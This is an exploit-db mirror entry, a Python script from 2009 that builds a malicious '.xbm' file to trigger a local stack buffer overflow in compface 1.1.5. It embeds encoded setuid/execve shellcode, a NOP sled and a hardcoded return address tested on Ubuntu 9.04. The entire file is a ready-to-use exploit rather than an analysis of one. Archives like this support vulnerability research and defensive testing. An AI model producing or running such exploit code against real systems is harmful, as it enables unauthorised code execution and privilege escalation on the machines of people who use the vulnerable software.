exploit-db-mirror/platforms/linux/local/9302.py

#!/usr/bin/python
#[*] Exploit     :      	Compface '.xbm' Local Buffer Overflow Exploit
#[*] Affected	 :		compface 1.1.5
#[*] Tested on   :   		Ubuntu 9.04 (without stack randomization)
#[*] Refer	 :		bid/35863
#[*] Exploit     : 		His0k4

#[*] Use : $compface exploit.xbm out

#setuid/execve shellcode for Linux/x86 by Marco Ivaldi
#[*] x86/alpha_mixed succeeded with size 124 (iteration=1)
shellcode=(
"\x89\xe1\xdb\xd1\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x42\x4a\x42\x37\x50\x58\x50\x31\x49\x4b\x48\x4d\x4d\x50\x42"
"\x4a\x44\x4b\x50\x58\x4d\x49\x51\x42\x42\x48\x46\x4f\x46\x4f"
"\x44\x33\x45\x38\x42\x48\x46\x4f\x42\x42\x42\x49\x42\x4e\x4b"
"\x39\x4d\x33\x51\x42\x50\x53\x4c\x49\x4b\x51\x48\x4d\x4d\x50"
"\x45\x5a\x41\x41")

payload =  "#define noname_width 48\r\n"
payload += "#define noname_height 48\r\n"
payload += "static\r\n"
payload += "\x90"*180
payload += "\x80\xf4\xff\xbf" #$esp+10h
payload += "\x90"*16
payload += shellcode
payload += "\r\n"
payload += "char = {\r\n"

try:
    out_file = open("exploit.xbm","w")
    out_file.write(payload)
    out_file.close()
    print("\nExploit file created!\n")
except:
    print "Error"

# milw0rm.com [2009-07-30]